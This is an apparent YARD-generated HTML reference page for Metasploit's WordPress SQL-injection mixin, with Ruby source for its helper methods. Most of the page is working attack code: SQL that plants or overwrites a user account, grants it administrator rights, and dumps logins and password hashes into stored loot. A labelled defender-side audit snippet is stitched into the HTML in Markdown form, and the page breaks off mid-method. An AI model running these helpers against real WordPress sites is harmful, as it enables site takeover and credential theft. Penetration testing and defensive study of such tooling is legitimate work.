metasploit-gs/api/Msf/Exploit/Remote/HTTP/Wordpress/SQLi.html
jenkins-metasploit c3f5bd3de2 Reboot gh-pages
2026-05-08 17:08:43 +00:00

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Module: Msf::Exploit::Remote::HTTP::Wordpress::SQLi
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Exploit::Remote::HTTP::Wordpress::SQLi";
relpath = '../../../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../../../_index.html">Index (S)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../HTTP.html" title="Msf::Exploit::Remote::HTTP (module)">HTTP</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../Wordpress.html" title="Msf::Exploit::Remote::HTTP::Wordpress (module)">Wordpress</a></span></span>
&raquo;
<span class="title">SQLi</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Module: Msf::Exploit::Remote::HTTP::Wordpress::SQLi
</h1>
<div class="box_info">
<dl>
<dt>Includes:</dt>
<dd><span class='object_link'><a href="../../../SQLi.html" title="Msf::Exploit::SQLi (module)">SQLi</a></span></dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/remote/http/wordpress/sqli.rb</dd>
</dl>
</div>
<h2>Overview</h2><div class="docstring">
<div class="discussion">
<p>This module provides reusable SQLi (SQL Injection) helper functions for WordPress exploits in Metasploit Framework. These functions allow for actions such as creating new users, granting privileges, and dumping user credentials via SQL injection vulnerabilities in WordPress.</p>
<p>Usage:</p>
<p>Include this module in your exploit or auxiliary module and use the provided functions to simplify SQL injection logic.</p>
</div>
</div>
<div class="tags">
</div>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#wordpress_sqli_create_user-instance_method" title="#wordpress_sqli_create_user (instance method)">#<strong>wordpress_sqli_create_user</strong>(username, password, email) &#x21d2; void </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Inject a user into the WordPress database, creating or updating an entry.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#wordpress_sqli_get_users_credentials-instance_method" title="#wordpress_sqli_get_users_credentials (instance method)">#<strong>wordpress_sqli_get_users_credentials</strong>(count = 10) &#x21d2; Array&lt;Array&gt; </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Get user credentials from the wp_users table.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#wordpress_sqli_grant_admin_privileges-instance_method" title="#wordpress_sqli_grant_admin_privileges (instance method)">#<strong>wordpress_sqli_grant_admin_privileges</strong>(username) &#x21d2; void </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Grant admin privileges to the specified user by creating or updating the appropriate meta entry.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#wordpress_sqli_identify_table_prefix-instance_method" title="#wordpress_sqli_identify_table_prefix (instance method)">#<strong>wordpress_sqli_identify_table_prefix</strong> &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Identify the table prefix for the WordPress installation.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#wordpress_sqli_initialize-instance_method" title="#wordpress_sqli_initialize (instance method)">#<strong>wordpress_sqli_initialize</strong>(sqli) &#x21d2; void </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Function to initialize the SQLi instance in the mixin.</p>
</div></span>
</li>
</ul>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../SQLi.html" title="Msf::Exploit::SQLi (module)">SQLi</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../SQLi.html#create_sqli-instance_method" title="Msf::Exploit::SQLi#create_sqli (method)">#create_sqli</a></span>, <span class='object_link'><a href="../../../SQLi.html#initialize-instance_method" title="Msf::Exploit::SQLi#initialize (method)">#initialize</a></span></p>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="wordpress_sqli_create_user-instance_method">
#<strong>wordpress_sqli_create_user</strong>(username, password, email) &#x21d2; <tt>void</tt>
</h3><div class="docstring">
<div class="discussion">
<p class="note returns_void">This method returns an undefined value.</p>
<p>Inject a user into the WordPress database, creating or updating an entry.</p>
<p>This method either creates a new user entry in the users table or updates an existing one. If the user already exists, their password, nicename, email, and display name will be updated. Otherwise, a new user will be created with the provided credentials and default values. The password is hashed using MD5 for compatibility with older WordPress versions.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>username</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The username for the new or updated user.</p>
</div>
</li>
<li>
<span class='name'>password</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The password for the new user (stored as an MD5 hash).</p>
</div>
</li>
<li>
<span class='name'>email</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The email for the new user.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/wordpress/sqli.rb', line 37</span>
<span class='kw'>def</span> <span class='id identifier rubyid_wordpress_sqli_create_user'>wordpress_sqli_create_user</span><span class='lparen'>(</span><span class='id identifier rubyid_username'>username</span><span class='comma'>,</span> <span class='id identifier rubyid_password'>password</span><span class='comma'>,</span> <span class='id identifier rubyid_email'>email</span><span class='rparen'>)</span>
<span class='id identifier rubyid_query'>query</span> <span class='op'>=</span> <span class='heredoc_beg'>&lt;&lt;-SQL</span>
<span class='tstring_content'> INSERT INTO </span><span class='embexpr_beg'>#{</span><span class='ivar'>@prefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name)
SELECT &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_username'>username</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;, MD5(&#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_password'>password</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;), &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_username'>username</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;, &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_email'>email</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;, user_registered, user_status, &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_username'>username</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;
FROM </span><span class='embexpr_beg'>#{</span><span class='ivar'>@prefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>users
WHERE NOT EXISTS (
SELECT 1 FROM </span><span class='embexpr_beg'>#{</span><span class='ivar'>@prefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>users WHERE user_login = &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_username'>username</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;
)
LIMIT 1
ON DUPLICATE KEY UPDATE
user_pass = MD5(&#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_password'>password</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;),
user_nicename = &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_username'>username</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;,
user_email = &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_email'>email</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;,
display_name = &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_username'>username</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;
</span><span class='heredoc_end'> SQL
</span>
<span class='ivar'>@sqli</span><span class='period'>.</span><span class='id identifier rubyid_raw_run_sql'>raw_run_sql</span><span class='lparen'>(</span><span class='id identifier rubyid_query'>query</span><span class='period'>.</span><span class='id identifier rubyid_strip'>strip</span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>\s+</span><span class='regexp_end'>/</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'> </span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>{WPSQLi} User &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_username'>username</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39; created or updated successfully.</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="wordpress_sqli_get_users_credentials-instance_method">
#<strong>wordpress_sqli_get_users_credentials</strong>(count = 10) &#x21d2; <tt>Array&lt;Array&gt;</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Get user credentials from the wp_users table.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>count</span>
<span class='type'>(<tt>Integer</tt>)</span>
<em class="default">(defaults to: <tt>10</tt>)</em>
&mdash;
<div class='inline'>
<p>The number of users to retrieve (default: 10)</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Array&lt;Array&gt;</tt>)</span>
&mdash;
<div class='inline'>
<p>Array of arrays containing user login and password hash</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/wordpress/sqli.rb', line 126</span>
<span class='kw'>def</span> <span class='id identifier rubyid_wordpress_sqli_get_users_credentials'>wordpress_sqli_get_users_credentials</span><span class='lparen'>(</span><span class='id identifier rubyid_count'>count</span> <span class='op'>=</span> <span class='int'>10</span><span class='rparen'>)</span>
<span class='id identifier rubyid_columns'>columns</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>user_login</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>user_pass</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_data'>data</span> <span class='op'>=</span> <span class='ivar'>@sqli</span><span class='period'>.</span><span class='id identifier rubyid_dump_table_fields'>dump_table_fields</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='ivar'>@prefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>users</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_columns'>columns</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_count'>count</span><span class='rparen'>)</span>
<span class='id identifier rubyid_table'>table</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='op'>::</span><span class='const'>Table</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Header</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='ivar'>@prefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>users</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Indent</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='int'>4</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Columns</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_columns'>columns</span>
<span class='rparen'>)</span>
<span class='id identifier rubyid_loot_data'>loot_data</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_data'>data</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_user'>user</span><span class='op'>|</span>
<span class='id identifier rubyid_table'>table</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_user'>user</span>
<span class='id identifier rubyid_loot_data'>loot_data</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Username: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_user'>user</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>, Password Hash: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_user'>user</span><span class='lbracket'>[</span><span class='int'>1</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>\n</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_create_credential'>create_credential</span><span class='lparen'>(</span><span class='lbrace'>{</span>
<span class='label'>workspace_id:</span> <span class='id identifier rubyid_myworkspace_id'>myworkspace_id</span><span class='comma'>,</span>
<span class='label'>origin_type:</span> <span class='symbol'>:service</span><span class='comma'>,</span>
<span class='label'>module_fullname:</span> <span class='id identifier rubyid_fullname'>fullname</span><span class='comma'>,</span>
<span class='label'>username:</span> <span class='id identifier rubyid_user'>user</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='label'>private_type:</span> <span class='symbol'>:nonreplayable_hash</span><span class='comma'>,</span>
<span class='label'>jtr_format:</span> <span class='const'><span class='object_link'><a href="../../../../../Metasploit.html" title="Metasploit (module)">Metasploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Metasploit/Framework.html" title="Metasploit::Framework (module)">Framework</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Metasploit/Framework/Hashes.html" title="Metasploit::Framework::Hashes (module)">Hashes</a></span></span><span class='period'>.</span><span class='id identifier rubyid_identify_hash'><span class='object_link'><a href="../../../../../Metasploit/Framework/Hashes.html#identify_hash-class_method" title="Metasploit::Framework::Hashes.identify_hash (method)">identify_hash</a></span></span><span class='lparen'>(</span><span class='id identifier rubyid_user'>user</span><span class='lbracket'>[</span><span class='int'>1</span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='label'>private_data:</span> <span class='id identifier rubyid_user'>user</span><span class='lbracket'>[</span><span class='int'>1</span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='label'>service_name:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>WordPress</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='label'>address:</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>RHOST</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='label'>port:</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>RPORT</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='label'>protocol:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>tcp</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='label'>status:</span> <span class='const'><span class='object_link'><a href="../../../../../Metasploit.html" title="Metasploit (module)">Metasploit</a></span></span><span class='op'>::</span><span class='const'>Model</span><span class='op'>::</span><span class='const'>Login</span><span class='op'>::</span><span class='const'>Status</span><span class='op'>::</span><span class='const'>UNTRIED</span>
<span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_vprint_good'>vprint_good</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>{WPSQLi} Credential for user &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_user'>user</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39; created successfully.</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>{WPSQLi} Dumped user data:</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_line'>print_line</span><span class='lparen'>(</span><span class='id identifier rubyid_table'>table</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='rparen'>)</span>
<span class='id identifier rubyid_loot_path'>loot_path</span> <span class='op'>=</span> <span class='id identifier rubyid_store_loot'>store_loot</span><span class='lparen'>(</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>wordpress.users</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>text/plain</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>RHOST</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='id identifier rubyid_loot_data'>loot_data</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>wp_users.txt</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>WordPress Usernames and Password Hashes</span><span class='tstring_end'>&#39;</span></span>
<span class='rparen'>)</span>
<span class='id identifier rubyid_print_good'>print_good</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Loot saved to: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_loot_path'>loot_path</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>{WPSQLi} Reporting host...</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_report_host'>report_host</span><span class='lparen'>(</span><span class='label'>host:</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>RHOST</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>{WPSQLi} Reporting service...</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_report_service'>report_service</span><span class='lparen'>(</span>
<span class='label'>host:</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>RHOST</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='label'>port:</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>RPORT</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='label'>proto:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>tcp</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='label'>name:</span> <span class='id identifier rubyid_fullname'>fullname</span><span class='comma'>,</span>
<span class='label'>info:</span> <span class='id identifier rubyid_description'>description</span><span class='period'>.</span><span class='id identifier rubyid_strip'>strip</span>
<span class='rparen'>)</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>{WPSQLi} Reporting vulnerability...</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_report_vuln'>report_vuln</span><span class='lparen'>(</span>
<span class='label'>host:</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>RHOST</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='label'>port:</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>RPORT</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='label'>proto:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>tcp</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='label'>name:</span> <span class='id identifier rubyid_fullname'>fullname</span><span class='comma'>,</span>
<span class='label'>refs:</span> <span class='id identifier rubyid_references'>references</span><span class='comma'>,</span>
<span class='label'>info:</span> <span class='id identifier rubyid_description'>description</span><span class='period'>.</span><span class='id identifier rubyid_strip'>strip</span>
<span class='rparen'>)</span>
<span class='id identifier rubyid_vprint_good'>vprint_good</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>{WPSQLi} Reporting completed successfully.</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='id identifier rubyid_data'>data</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="wordpress_sqli_grant_admin_privileges-instance_method">
#<strong>wordpress_sqli_grant_admin_privileges</strong>(username) &#x21d2; <tt>void</tt>
</h3><div class="docstring">
<div class="discussion">
<p class="note returns_void">This method returns an undefined value.</p>
<p>Grant admin privileges to the specified user by creating or updating the appropriate meta entry.</p>
<p>This method either creates a new entry in the usermeta table or updates an existing one to grant administrator capabilities to the specified user. If the entry for the user's capabilities already exists, it will be updated to assign administrator privileges. If the entry does not exist, a new one will be created.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>username</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The username of the user to grant privileges to.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/wordpress/sqli.rb', line 67</span>
<span class='kw'>def</span> <span class='id identifier rubyid_wordpress_sqli_grant_admin_privileges'>wordpress_sqli_grant_admin_privileges</span><span class='lparen'>(</span><span class='id identifier rubyid_username'>username</span><span class='rparen'>)</span>
<span class='id identifier rubyid_admin_query'>admin_query</span> <span class='op'>=</span> <span class='heredoc_beg'>&lt;&lt;-SQL</span>
<span class='tstring_content'> INSERT INTO </span><span class='embexpr_beg'>#{</span><span class='ivar'>@prefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>usermeta (user_id, meta_key, meta_value)
SELECT ID, &#39;</span><span class='embexpr_beg'>#{</span><span class='ivar'>@prefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>capabilities&#39;, &#39;a:1:{s:13:&quot;administrator&quot;;s:1:&quot;1&quot;;}&#39;
FROM </span><span class='embexpr_beg'>#{</span><span class='ivar'>@prefix</span><span class='embexpr_end'>}</span><span class='tstring_content'>users
WHERE user_login = &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_username'>username</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;
ON DUPLICATE KEY UPDATE
meta_value = &#39;a:1:{s:13:&quot;administrator&quot;;s:1:&quot;1&quot;;}&#39;
</span><span class='heredoc_end'> SQL
</span>
<span class='ivar'>@sqli</span><span class='period'>.</span><span class='id identifier rubyid_raw_run_sql'>raw_run_sql</span><span class='lparen'>(</span><span class='id identifier rubyid_admin_query'>admin_query</span><span class='period'>.</span><span class='id identifier rubyid_strip'>strip</span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>\s+</span><span class='regexp_end'>/</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'> </span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>{WPSQLi} Admin privileges granted or updated for user &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_username'>username</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;.</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
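<p>Added example, not part of the Metasploit source: a defender-side audit of the usermeta rows this method writes. WordPress core stores role flags as PHP booleans (<tt>b:1</tt>), while the query above writes the string form <tt>s:1:"1"</tt>, so a string-typed administrator entry is worth reviewing. The function names, row layout and sample rows are assumptions constructed for illustration.</p>

```ruby
require 'strscan'

# Added example (not Metasploit code). One role entry of a PHP-serialized array:
#   s:<len>:"<role>";b:1;       boolean flag, the form WordPress core writes
#   s:<len>:"<role>";s:1:"1";   string flag, the form used in the query above
ROLE_ENTRY = /s:(\d+):"([^"]*)";(?:b:([01])|s:\d+:"([^"]*)");/

# Parse the flat role => flag array stored under <prefix>capabilities.
# Returns { role => { type:, value: } }, or nil if the value is malformed.
def parse_capabilities(meta_value)
  outer = /\Aa:(\d+):\{(.*)\}\z/m.match(meta_value.to_s)
  return nil unless outer

  caps = {}
  scanner = StringScanner.new(outer[2])
  until scanner.eos?
    return nil unless scanner.scan(ROLE_ENTRY)
    return nil unless scanner[1].to_i == scanner[2].bytesize # declared length must match

    caps[scanner[2]] =
      scanner[3] ? { type: :bool, value: scanner[3] } : { type: :string, value: scanner[4] }
  end
  caps.size == outer[1].to_i ? caps : nil
end

# Flag capability rows that are malformed or grant administrator with a string flag.
def audit_capabilities(rows, prefix: 'wp_')
  key = "#{prefix}capabilities"
  rows.select { |r| r[:meta_key] == key }.filter_map do |row|
    caps = parse_capabilities(row[:meta_value])
    if caps.nil?
      { user_id: row[:user_id], finding: :malformed }
    elsif caps.dig('administrator', :type) == :string
      { user_id: row[:user_id], finding: :non_native_admin_grant }
    end
  end
end

# Constructed sample rows (not from a real site).
SAMPLE_ROWS = [
  { user_id: 1, meta_key: 'wp_capabilities', meta_value: 'a:1:{s:13:"administrator";b:1;}' },
  { user_id: 2, meta_key: 'wp_capabilities', meta_value: 'a:1:{s:10:"subscriber";b:1;}' },
  { user_id: 7, meta_key: 'wp_capabilities', meta_value: 'a:1:{s:13:"administrator";s:1:"1";}' },
  { user_id: 9, meta_key: 'wp_capabilities', meta_value: 'a:1:{s:13:"administrator"' },
  { user_id: 7, meta_key: 'nickname', meta_value: 'constructed' }
].freeze

audit_capabilities(SAMPLE_ROWS).each { |finding| puts finding.inspect }
```

<p>Pass the site's real table prefix as <tt>prefix:</tt> when it is not <tt>wp_</tt>; a flagged row is a lead for review, since plugins or manual edits can also produce unusual values.</p>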
<div class="method_details ">
<h3 class="signature " id="wordpress_sqli_identify_table_prefix-instance_method">
#<strong>wordpress_sqli_identify_table_prefix</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
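<p>Identifies the table prefix of the WordPress installation. The default prefix <tt>wp_</tt> is checked first; if it is not found, the prefix is derived from a table in the current database whose name ends in <tt>_users</tt> and that has both <tt>user_login</tt> and <tt>user_pass</tt> columns.</p>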
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
